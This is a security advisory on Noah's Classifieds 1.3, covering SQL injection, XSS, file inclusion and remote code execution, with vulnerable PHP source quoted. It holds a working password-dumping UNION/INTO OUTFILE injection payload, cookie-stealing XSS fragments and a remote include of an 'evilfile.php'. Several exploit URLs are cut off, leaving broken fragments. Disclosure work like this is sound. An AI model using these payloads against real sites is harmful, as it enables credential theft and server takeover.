Noah's classifieds multiple vulnerabilities

Credit: trueend5
Risk: High
Local: Yes
Remote: Yes

CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: Partial

KAPDA New advisory Vendor: Vulnerable: Noah`s classifieds 1.3 and below (classifieds component for mambo also may be affected) Bug: Path Disclosure,Sql Injection,XSS,Local file inclusion,Remote code execution Exploitation: Remote with browser Exploit:available Description: -------------------- Noah' Classifieds is a general purpose application that allows you to set up as many ad categories as you want specifying custom fields for each of them. Vulnerabilities: -------------------- Path disclosure (direct access to include files) -------------------------- -------------------------- Sql Injection: (search tool, HTTP method:POST, condition: mysql user with file privilege) kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/resu lt.text'/**/FROM/**/classifieds_classifiedsuser# -------------------------- -------------------------- Cross site scripting 1- cookie)%3C/script%3E /gorum/gorumlib.php if( isset($HTTP_GET_VARS["inf"]) ) $infoText=$HTTP_GET_VARS["inf"]; $sApp=$init->showApp(); $s.=$globHtmlHead;//fontos, hogy felulirhato legyen az app-ban --- 2- (document.cookie)%3C/script%3E (condition:rgister_globals=On) -------------------------- -------------------------- Local file inclusion (condition: magic_quotes_gpc=Off For none php files ) swd%00 /include.php if (isset($otherTemplate)) { include("./template$otherTemplate.php"); } else include("./template.php"); -------------------------- -------------------------- Remote code execution (condition: register_globals=On) om/evilfile.php /gorum/constants.php if (!isset($upperTemplate)) $upperTemplate = "<body>n"; if (!isset($lowerTemplate)) $lowerTemplate = "</body>"; /gorum/gorumlib.php if (ereg(".php$",$upperTemplate)) {//just check $ret=@fopen($upperTemplate,"r"); if (!$ret) { $infoText = sprintf($lll["incl_header_err"],$upperTemplate); } @fclose($f); } if (ereg(".php$",$lowerTemplate)) {//just check $ret=@fopen($lowerTemplate,"r"); if (!$ret) { if (!isset($infoText)) $infoText=""; $infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate); } @fclose($f); } . . . $upperTemplate=trim($upperTemplate); if (ereg(".php$",$upperTemplate)) { $ret=@include($upperTemplate); } else $s.="$upperTemplaten"; $lowerTemplate=trim($lowerTemplate); $s.=$sApp; if (ereg(".php$",$lowerTemplate)) $ret=@include($lowerTemplate); else $s.="$lowerTemplaten"; } More details with Exploit --------- In Farsi: Solution: --------- There is no vendor supplied patch for this issue. From Vendor`s website: "Currently, we are completely overloaded with our running projects, and we don't have enough time to deal with our free products. The further development and support of Noah's Classifieds is therefore suspended. Thank you for the understanding and please forgive us that we don't responding to the emails." Credit : --------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran []

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